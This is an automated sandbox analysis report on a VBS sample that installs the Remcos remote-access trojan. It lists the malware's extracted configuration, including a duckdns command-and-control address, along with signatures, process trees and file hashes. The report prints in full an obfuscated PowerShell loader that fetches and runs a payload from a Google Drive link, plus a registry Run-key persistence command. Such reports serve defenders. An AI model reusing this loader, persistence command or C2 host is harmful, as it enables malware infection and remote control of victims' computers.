Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
29-11-2024 02:54
Static task
static1
Behavioral task
behavioral1
Sample
1e74e14032fe7b84a6285d72cfea681f4ec1d0bffe896f02fac5f0c5e5b96060.vbs
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
1e74e14032fe7b84a6285d72cfea681f4ec1d0bffe896f02fac5f0c5e5b96060.vbs
Resource
win10v2004-20241007-en
General
-
Target
1e74e14032fe7b84a6285d72cfea681f4ec1d0bffe896f02fac5f0c5e5b96060.vbs
-
Size
33KB
-
MD5
b9d77e317447cf7b4fc1b538d04a35d7
-
SHA1
4bfff79ba434d7c5a508f9ba2720f4ef47cfecec
-
SHA256
1e74e14032fe7b84a6285d72cfea681f4ec1d0bffe896f02fac5f0c5e5b96060
-
SHA512
9691361f42668c8dcf9764ac86ad355c5039ca927140ce732452cba7df12bad70ff46c87c54cd8ae6e6cf4673e3bc57894663c8b301f0e40344c0b21dab20ce7
-
SSDEEP
768:EA9as2DrXeg09BTUUsKNq4Hm8hZn6TgXzwbVV+E2rEJ9YnCmw6fd:D9asyevU844HT/6azCkE2oJIu6d
Malware Config
Extracted
remcos
RemoteHost
8766e34g8.duckdns.org:3782
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
true
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-93TSMD
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 8 IoCs
Processes:
WScript.exepowershell.exemsiexec.exeflow pid Process 3 2884 WScript.exe 7 3040 powershell.exe 9 3040 powershell.exe 11 1112 msiexec.exe 13 1112 msiexec.exe 15 1112 msiexec.exe 17 1112 msiexec.exe 18 1112 msiexec.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Aidless125% -windowstyle 1 $Grangiveligt=(gp -Path 'HKCU:\\Software\\Produktionsdatabaser11\\').Monociliated;%Aidless125% ($Grangiveligt)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
msiexec.exepid Process 1112 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exemsiexec.exepid Process 932 powershell.exe 1112 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
reg.exepowershell.exemsiexec.execmd.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepid Process 3040 powershell.exe 932 powershell.exe 932 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid Process 932 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 3040 powershell.exe Token: SeDebugPrivilege 932 powershell.exe -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
WScript.exepowershell.exemsiexec.execmd.exedescription pid Process procid_target PID 2884 wrote to memory of 3040 2884 WScript.exe 30 PID 2884 wrote to memory of 3040 2884 WScript.exe 30 PID 2884 wrote to memory of 3040 2884 WScript.exe 30 PID 932 wrote to memory of 1112 932 powershell.exe 35 PID 932 wrote to memory of 1112 932 powershell.exe 35 PID 932 wrote to memory of 1112 932 powershell.exe 35 PID 932 wrote to memory of 1112 932 powershell.exe 35 PID 932 wrote to memory of 1112 932 powershell.exe 35 PID 932 wrote to memory of 1112 932 powershell.exe 35 PID 932 wrote to memory of 1112 932 powershell.exe 35 PID 932 wrote to memory of 1112 932 powershell.exe 35 PID 1112 wrote to memory of 2108 1112 msiexec.exe 37 PID 1112 wrote to memory of 2108 1112 msiexec.exe 37 PID 1112 wrote to memory of 2108 1112 msiexec.exe 37 PID 1112 wrote to memory of 2108 1112 msiexec.exe 37 PID 2108 wrote to memory of 2328 2108 cmd.exe 39 PID 2108 wrote to memory of 2328 2108 cmd.exe 39 PID 2108 wrote to memory of 2328 2108 cmd.exe 39 PID 2108 wrote to memory of 2328 2108 cmd.exe 39
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1e74e14032fe7b84a6285d72cfea681f4ec1d0bffe896f02fac5f0c5e5b96060.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$vandresourcers='Borgerpligts';;$Theobromic202='Fukssvanses';;$Dunt='Absurdisten';;$Milieuomraadets='Chrysophyllum';;$Diamantbrylluppernes='Catalyses';;$Clappered=$host.Name;function Sastrugi($Dampbadenes){If ($Clappered) {$Arkitekttegningens=4} for ($Regionalprogrammerne=$Arkitekttegningens;;$Regionalprogrammerne+=5){if(!$Dampbadenes[$Regionalprogrammerne]) { break }$Forumers+=$Dampbadenes[$Regionalprogrammerne]}$Forumers}function Svmmeprvens($Remobilizing){ .($Linguae) ($Remobilizing)}$Sangpdagoger=Sastrugi 'Percn,ndeeBlaattele. SkoWUforeMa eBTabuCremoLGr uI SeqE vernOleat';$Radialia=Sastrugi ' legMUnbro Broz ProiBetol PoslYikeaSkde/';$Goatherd=Sastrugi 'van T Fo.lNinns Kon1Sikk2';$Afrundendes='Tewe[ PusN udsELu ut Han.JuleSBogoEVi eRBusbvfrieIwhizC ,umESkpppp,rso Stai eucN TodtDyveM aiaFo nn Jera LivgSemieSnjarenig]G aa:Topp:BrnlSVa be G,sC afsUFotor H,ciFlleTTrepY EupPKu,sRAntiO.orgTLeveOKlbecForsOSm eLLssa=Di e$ D mGphotoPitiAMadoT ConH,ortETyr.RoverD';$Radialia+=Sastrugi 'Kikk5Ethe. Sm.0Eksk Unbu(VedeWReiniHovenD.spd A ioFro wgubbsMili EsmaNIn xTFor Smer1 T,i0Verd.Sl d0Data; F a OculWSulkiHjemnKbsv6 Gon4stri;Byre ,onbxZ go6Thor4Mini;D al Hulkr.ddav.eme:john1L,ft3 fin1Port.S zi0Unco)Inst AloeGholleC,vecAtikkFragoPebb/ Jos2Reno0srsy1Prin0Pl s0Skrn1Verd0Tr n1Rood ElleFBehoiWrearRep,e KanfobidoS.lmx rif/Braz1 Row3Uans1Pakn. Ba.0';$Tremoloerne=Sastrugi ' Lydu nrrSSalvEAfgir Syn-SwarATandGLid EIrriN vett';$Pteropod=Sastrugi 'Vil hE octShantbe,apKupfsDele:T mm/Werw/BlaadOverr Cati SubvPu teP le.RollgKaido Bruo DusgHeadlKunseChry. AnkcNatmosterm ,gl/R gauChasc Bot?Timee L nxUdrup tato.ratr L.mt Val=,enodPropoP,rewAll nG,odlBittoPiecaSupedU em& Pe igavod U s= Re 1SundbgreeqStilSRatig Vesg bouW InscOpprlTempw TagLFlaa5 Skol hotOApprgfritRGasbfBro LPunktEt,mU aywlDivaFHej PEman8AnviWDy nFbe.mlEdibQ ropQSar 6S ygG DyrStune3';$Wac=Sastrugi 'Dd s>';$Linguae=Sastrugi 'Hdr iCapceOpdyx';$Onomancy='correlativity';$Begrnsende='\Hovedaktionrer179.Lin';Svmmeprvens (Sastrugi ' E,a$MultGHalvl ImpoAutobHo oaAltel Mal:CertKK deoFrakMTrenM Trau O tNYndla ForrHejddEksa=Afbi$Stere ifeNAdviVLand:HoopaIn.epF,roPPos dsemia CheTudspa Bur+Stal$Demob IchEHyldGGrn RA deNCaneSCalaEKnsbnTakkd nonE');Svmmeprvens (Sastrugi ' Des$ParagGlovlI dhoErfab StiAAntiLS ec: A.kPFlisR SamOSa,mFForelpastiRnt,GUnmea,ritCO tfIFiskEForfS S,p=Kigs$Saalp sirTPenueatrorEmbrO ejlPStraOPelidGlam.PseuSConcpBldslSluiIbasitTim.(stat$TortWTarvAKogecafho)');Svmmeprvens (Sastrugi $Afrundendes);$Pteropod=$Profligacies[0];$Batistet=(Sastrugi ' pol$To hGPartLMilloSilvBarmoaStraL Max:preas SerC howaComppSoldIFormn A pGBo,d=M,nunSoevEInstwMerg- BlaOTeleBHitcJJay EunciCBefrt ara TiteSGkkeYOpinsProptEtereAcr.mprec. fdr$ .ucsManzA Ko NSottGAdrePEigeD lbeaAttaG eho jerGTakteStatR');Svmmeprvens ($Batistet);Svmmeprvens (Sastrugi 'Unra$ ,veS MaucLovpa SoupRetsiWappnStimg Dra.DeciHNakoeUmi,a LogdFej eDracrIsocs Dik[V lu$ReckTLygtrChi eStabmKl.noRaadlTaboo Smae hewr Radn Bile Alo]Forl=In.r$StyrRCantaR,todbagli areagenelStariBer.a');$Resynthetize=Sastrugi 'Lewd$SystSAnglcCravais gpFadeiE kanCruegCabb. MytD.oploMalcwVashnGliplCo moRudka randO raFDemii Tell geneNedd(Sn.k$.arsP Famt dvieCatsrSporo uscpJordo atcdArgu,Work$UdlgAVgten AnsaProdlW igyStils roueC immInfloSo.idPreleDemolAfl.)';$Analysemodel=$Kommunard;Svmmeprvens (Sastrugi ' Ch $Ste,GPakel nugOClanBTrilaTupiLSols:St.lETabup,ratiPotalFal aInsttMoo,O AntRFadg=Omen(H,maTLuppEVgtiSCanotMaal- s.apAfpoaSt mt F lHRa,k S,ge$ SinaListN onaH lvlrumky,enhsSa deSnidMStegOPir,d LubEU polB.go)');while (!$Epilator) {Svmmeprvens (Sastrugi 'Slud$NighgMedil Afio ilbRe ia UdglLitt:CremPMisdrEtheeGy nsGenec Tatrpa aiOverpSal tP ngiStrob DobiRegalChiriPirotCarpyTork=Pole$SkirTMameaTandrFuldaDr vz Grue Mitd') ;Svmmeprvens $Resynthetize;Svmmeprvens (Sastrugi 'ShaispermT Idea aluRStunTP tc-Fes,SOverL SocESmd,eRevapBlok Ug,d4');Svmmeprvens (Sastrugi ' Kn.$Co.eGSa iLRubbOSyntbUdflAGrapLLand:Fa aEeisepSpgeIByggl HexAGulst Inho Em rbl n=H.rp(UndetGoddeSignSFl ct Tar- TilP FalAEnvoTB nihSelv at$Ble,AukamNRomaaCan.LRu aYA kesN dbEU.coMBi.loP otDsoliEMedlLfal )') ;Svmmeprvens (Sastrugi 'Doec$P.angAfg l LevO S rBColoAStablVaab: V nsBri,a UndI FroL MisOAnnerUndeiColozOpviI FleN I bGHe dsHydr=.rbe$OverGCanvlHe,oo DecBOverAEquiLKos,:IndssNvnit IrlUSrb,t DumT InteBoatrBivai Id HF emOMiaspfragPHenbEGamb+Hind+De u%Grim$,nnapAfprR AnaOFokufEle,LId lIBankgRadmaBugpc Teli DisEPrmismen .PneuC SimOSemuUMagtN ncT') ;$Pteropod=$Profligacies[$Sailorizings]}$Regionalprogrammernendsmuglingerne=309529;$Disjunctor=31536;Svmmeprvens (Sastrugi 'Meta$SmerGOrnil Kloo Harb ajaMedilDisb:FrarUUdliDLvsplIsoaB forsUsmiTPolyiBeauD .ens Seap KatUSta.nUncaKAnn.tUn rEc rrTB ne stje=Unan GigaG gtee vertBarb- Ba cBls.OKnocnUn rtDaggEYuccNdrudT so Pot $S udAu,ben pa,AT reLOpskyT rbSUtaleR mmMSemiOIn edIndfeOverL');Svmmeprvens (Sastrugi 'Tilb$ Lnug Bygl ,vaost.ib ,asaBonzlNond:.eloK AncaIdellParnk AteuK,rdnnerdlScruaHyp aH rrr lsf Eng=Unfa Bom,[OrgaSKompy Pols Prot KoreRolemBall.hydrC A hoLacqnUnr,vDataeMailrVe etAnke] Das:Ka.t: CesFHeltr Ostosn gmChamBIslaaPaafs .iseKaka6 Dek4PoliSUnuntEdderOveri Ov n klugPhi (Fo s$BaasU DjvdBerel ,adbAbsos untAngeiKarldArunsS inpKlenu Catn CytkGenotB oweSk ut Hel)');Svmmeprvens (Sastrugi 'M lt$Fri.gUds lLeptoGalmB nodAOverlKame:SlagS BurTTrosASk naIndottrekR eulOImmul HakD halEBurgNKanusIn e ,lg=Livr Komm[TomnsBa.tyWreas UnpT OveEBemamUd n. PsaTVerde ernX conTKopo.VoldEHyp,NNonicstnnomar.dSpk,IFotonB.atGKigg]Spoo: Pan:ChorAwomesBillCCirciUndii hai.An.igIs rEScarTNyopSAlfrtInadrGashIK mmNnic g r.g( Mar$DeraKEarmAAposl RevKOb tUFl,bnTe elKonsa .mka VesRGraf)');Svmmeprvens (Sastrugi ' Skr$VictgIndll Ci.O aksB teoa CorlLi e:GufscKnska SpuVM,ntaSluklBypa= Cha$ Ep,SGranT TacA.isaAKlasTAa,eROnomOadvaL rieDReine.eriNstn,sen a. ImpsaandUT,lebP,rnsSport SlarUndeIStraN GengSecc(Skal$Und.rKny.EP lhGBindiUnexocof.NS avAIwbelUndiPPhilr oldoRoitgSkovRHotnaBee mAestMSyr ESmugRPrecnVkkeE Fr nBlacd eouS PenmPavoUGagcg upilValgIBre NNondg CapeSt,eRHur,n,ilbETrip,out,$ Ve dCom iMonoS PosjBet U EgoNSma cSammTDissO ProR tr )');Svmmeprvens $Caval;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$vandresourcers='Borgerpligts';;$Theobromic202='Fukssvanses';;$Dunt='Absurdisten';;$Milieuomraadets='Chrysophyllum';;$Diamantbrylluppernes='Catalyses';;$Clappered=$host.Name;function Sastrugi($Dampbadenes){If ($Clappered) {$Arkitekttegningens=4} for ($Regionalprogrammerne=$Arkitekttegningens;;$Regionalprogrammerne+=5){if(!$Dampbadenes[$Regionalprogrammerne]) { break }$Forumers+=$Dampbadenes[$Regionalprogrammerne]}$Forumers}function Svmmeprvens($Remobilizing){ .($Linguae) ($Remobilizing)}$Sangpdagoger=Sastrugi 'Percn,ndeeBlaattele. SkoWUforeMa eBTabuCremoLGr uI SeqE vernOleat';$Radialia=Sastrugi ' legMUnbro Broz ProiBetol PoslYikeaSkde/';$Goatherd=Sastrugi 'van T Fo.lNinns Kon1Sikk2';$Afrundendes='Tewe[ PusN udsELu ut Han.JuleSBogoEVi eRBusbvfrieIwhizC ,umESkpppp,rso Stai eucN TodtDyveM aiaFo nn Jera LivgSemieSnjarenig]G aa:Topp:BrnlSVa be G,sC afsUFotor H,ciFlleTTrepY EupPKu,sRAntiO.orgTLeveOKlbecForsOSm eLLssa=Di e$ D mGphotoPitiAMadoT ConH,ortETyr.RoverD';$Radialia+=Sastrugi 'Kikk5Ethe. Sm.0Eksk Unbu(VedeWReiniHovenD.spd A ioFro wgubbsMili EsmaNIn xTFor Smer1 T,i0Verd.Sl d0Data; F a OculWSulkiHjemnKbsv6 Gon4stri;Byre ,onbxZ go6Thor4Mini;D al Hulkr.ddav.eme:john1L,ft3 fin1Port.S zi0Unco)Inst AloeGholleC,vecAtikkFragoPebb/ Jos2Reno0srsy1Prin0Pl s0Skrn1Verd0Tr n1Rood ElleFBehoiWrearRep,e KanfobidoS.lmx rif/Braz1 Row3Uans1Pakn. Ba.0';$Tremoloerne=Sastrugi ' Lydu nrrSSalvEAfgir Syn-SwarATandGLid EIrriN vett';$Pteropod=Sastrugi 'Vil hE octShantbe,apKupfsDele:T mm/Werw/BlaadOverr Cati SubvPu teP le.RollgKaido Bruo DusgHeadlKunseChry. AnkcNatmosterm ,gl/R gauChasc Bot?Timee L nxUdrup tato.ratr L.mt Val=,enodPropoP,rewAll nG,odlBittoPiecaSupedU em& Pe igavod U s= Re 1SundbgreeqStilSRatig Vesg bouW InscOpprlTempw TagLFlaa5 Skol hotOApprgfritRGasbfBro LPunktEt,mU aywlDivaFHej PEman8AnviWDy nFbe.mlEdibQ ropQSar 6S ygG DyrStune3';$Wac=Sastrugi 'Dd s>';$Linguae=Sastrugi 'Hdr iCapceOpdyx';$Onomancy='correlativity';$Begrnsende='\Hovedaktionrer179.Lin';Svmmeprvens (Sastrugi ' E,a$MultGHalvl ImpoAutobHo oaAltel Mal:CertKK deoFrakMTrenM Trau O tNYndla ForrHejddEksa=Afbi$Stere ifeNAdviVLand:HoopaIn.epF,roPPos dsemia CheTudspa Bur+Stal$Demob IchEHyldGGrn RA deNCaneSCalaEKnsbnTakkd nonE');Svmmeprvens (Sastrugi ' Des$ParagGlovlI dhoErfab StiAAntiLS ec: A.kPFlisR SamOSa,mFForelpastiRnt,GUnmea,ritCO tfIFiskEForfS S,p=Kigs$Saalp sirTPenueatrorEmbrO ejlPStraOPelidGlam.PseuSConcpBldslSluiIbasitTim.(stat$TortWTarvAKogecafho)');Svmmeprvens (Sastrugi $Afrundendes);$Pteropod=$Profligacies[0];$Batistet=(Sastrugi ' pol$To hGPartLMilloSilvBarmoaStraL Max:preas SerC howaComppSoldIFormn A pGBo,d=M,nunSoevEInstwMerg- BlaOTeleBHitcJJay EunciCBefrt ara TiteSGkkeYOpinsProptEtereAcr.mprec. fdr$ .ucsManzA Ko NSottGAdrePEigeD lbeaAttaG eho jerGTakteStatR');Svmmeprvens ($Batistet);Svmmeprvens (Sastrugi 'Unra$ ,veS MaucLovpa SoupRetsiWappnStimg Dra.DeciHNakoeUmi,a LogdFej eDracrIsocs Dik[V lu$ReckTLygtrChi eStabmKl.noRaadlTaboo Smae hewr Radn Bile Alo]Forl=In.r$StyrRCantaR,todbagli areagenelStariBer.a');$Resynthetize=Sastrugi 'Lewd$SystSAnglcCravais gpFadeiE kanCruegCabb. MytD.oploMalcwVashnGliplCo moRudka randO raFDemii Tell geneNedd(Sn.k$.arsP Famt dvieCatsrSporo uscpJordo atcdArgu,Work$UdlgAVgten AnsaProdlW igyStils roueC immInfloSo.idPreleDemolAfl.)';$Analysemodel=$Kommunard;Svmmeprvens (Sastrugi ' Ch $Ste,GPakel nugOClanBTrilaTupiLSols:St.lETabup,ratiPotalFal aInsttMoo,O AntRFadg=Omen(H,maTLuppEVgtiSCanotMaal- s.apAfpoaSt mt F lHRa,k S,ge$ SinaListN onaH lvlrumky,enhsSa deSnidMStegOPir,d LubEU polB.go)');while (!$Epilator) {Svmmeprvens (Sastrugi 'Slud$NighgMedil Afio ilbRe ia UdglLitt:CremPMisdrEtheeGy nsGenec Tatrpa aiOverpSal tP ngiStrob DobiRegalChiriPirotCarpyTork=Pole$SkirTMameaTandrFuldaDr vz Grue Mitd') ;Svmmeprvens $Resynthetize;Svmmeprvens (Sastrugi 'ShaispermT Idea aluRStunTP tc-Fes,SOverL SocESmd,eRevapBlok Ug,d4');Svmmeprvens (Sastrugi ' Kn.$Co.eGSa iLRubbOSyntbUdflAGrapLLand:Fa aEeisepSpgeIByggl HexAGulst Inho Em rbl n=H.rp(UndetGoddeSignSFl ct Tar- TilP FalAEnvoTB nihSelv at$Ble,AukamNRomaaCan.LRu aYA kesN dbEU.coMBi.loP otDsoliEMedlLfal )') ;Svmmeprvens (Sastrugi 'Doec$P.angAfg l LevO S rBColoAStablVaab: V nsBri,a UndI FroL MisOAnnerUndeiColozOpviI FleN I bGHe dsHydr=.rbe$OverGCanvlHe,oo DecBOverAEquiLKos,:IndssNvnit IrlUSrb,t DumT InteBoatrBivai Id HF emOMiaspfragPHenbEGamb+Hind+De u%Grim$,nnapAfprR AnaOFokufEle,LId lIBankgRadmaBugpc Teli DisEPrmismen .PneuC SimOSemuUMagtN ncT') ;$Pteropod=$Profligacies[$Sailorizings]}$Regionalprogrammernendsmuglingerne=309529;$Disjunctor=31536;Svmmeprvens (Sastrugi 'Meta$SmerGOrnil Kloo Harb ajaMedilDisb:FrarUUdliDLvsplIsoaB forsUsmiTPolyiBeauD .ens Seap KatUSta.nUncaKAnn.tUn rEc rrTB ne stje=Unan GigaG gtee vertBarb- Ba cBls.OKnocnUn rtDaggEYuccNdrudT so Pot $S udAu,ben pa,AT reLOpskyT rbSUtaleR mmMSemiOIn edIndfeOverL');Svmmeprvens (Sastrugi 'Tilb$ Lnug Bygl ,vaost.ib ,asaBonzlNond:.eloK AncaIdellParnk AteuK,rdnnerdlScruaHyp aH rrr lsf Eng=Unfa Bom,[OrgaSKompy Pols Prot KoreRolemBall.hydrC A hoLacqnUnr,vDataeMailrVe etAnke] Das:Ka.t: CesFHeltr Ostosn gmChamBIslaaPaafs .iseKaka6 Dek4PoliSUnuntEdderOveri Ov n klugPhi (Fo s$BaasU DjvdBerel ,adbAbsos untAngeiKarldArunsS inpKlenu Catn CytkGenotB oweSk ut Hel)');Svmmeprvens (Sastrugi 'M lt$Fri.gUds lLeptoGalmB nodAOverlKame:SlagS BurTTrosASk naIndottrekR eulOImmul HakD halEBurgNKanusIn e ,lg=Livr Komm[TomnsBa.tyWreas UnpT OveEBemamUd n. PsaTVerde ernX conTKopo.VoldEHyp,NNonicstnnomar.dSpk,IFotonB.atGKigg]Spoo: Pan:ChorAwomesBillCCirciUndii hai.An.igIs rEScarTNyopSAlfrtInadrGashIK mmNnic g r.g( Mar$DeraKEarmAAposl RevKOb tUFl,bnTe elKonsa .mka VesRGraf)');Svmmeprvens (Sastrugi ' Skr$VictgIndll Ci.O aksB teoa CorlLi e:GufscKnska SpuVM,ntaSluklBypa= Cha$ Ep,SGranT TacA.isaAKlasTAa,eROnomOadvaL rieDReine.eriNstn,sen a. ImpsaandUT,lebP,rnsSport SlarUndeIStraN GengSecc(Skal$Und.rKny.EP lhGBindiUnexocof.NS avAIwbelUndiPPhilr oldoRoitgSkovRHotnaBee mAestMSyr ESmugRPrecnVkkeE Fr nBlacd eouS PenmPavoUGagcg upilValgIBre NNondg CapeSt,eRHur,n,ilbETrip,out,$ Ve dCom iMonoS PosjBet U EgoNSma cSammTDissO ProR tr )');Svmmeprvens $Caval;"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:932 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Aidless125% -windowstyle 1 $Grangiveligt=(gp -Path 'HKCU:\Software\Produktionsdatabaser11\').Monociliated;%Aidless125% ($Grangiveligt)"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Aidless125% -windowstyle 1 $Grangiveligt=(gp -Path 'HKCU:\Software\Produktionsdatabaser11\').Monociliated;%Aidless125% ($Grangiveligt)"4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2328
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD51498d5cbf1b1cbce828468113e4f0b1a
SHA184e1d005549721b232bf5ba9893aca5ab9ecc35e
SHA256157e8d04da1bb67db5c5d9cb37e01dcd46ac39e9c7265a836117b11278578bbd
SHA51231b9ab872d94a55867b401c5906ac9897f3cd26e7a365eb97deec30dd154aa9534146a5777298d9bf531c4c58c7bc304ec8ed2aaff39ce71665d7bb16fb4cce3
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
444KB
MD51a7915fabbce501dd7afe88661bcbe9c
SHA1d668290fab52392569a7a75725657dd2f723b995
SHA256c80389f6adceb9209c16c3809e1bdba055e06dc1dcf7a151478c3c6ac8274428
SHA512035bd6316b35020439885b90bd24c6269bd207a8613f3e7856c2b8386193012e93b2d801178c13e530fd5dda5d48419a8eea440011fd36f4714ffbd8263a3fbc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ILO1HHOU7GQ3B8DZAWUA.temp
Filesize7KB
MD5ed0978c5b26d77f3c43a5a77ed73d424
SHA1afdf4575418cdf221e7311b06a2a0cd68b25af36
SHA256645619340567e92d782d69812425d98ad269c75cadffffe91b94aead359410ad
SHA5129260983fd3b8b50c308ecc6bc79572334965340b56faba80b2c0fa351d9bb6e9e427a6648fcaf2fcda59c27dec859163cf5ad75d75ef6704e2a372edab210588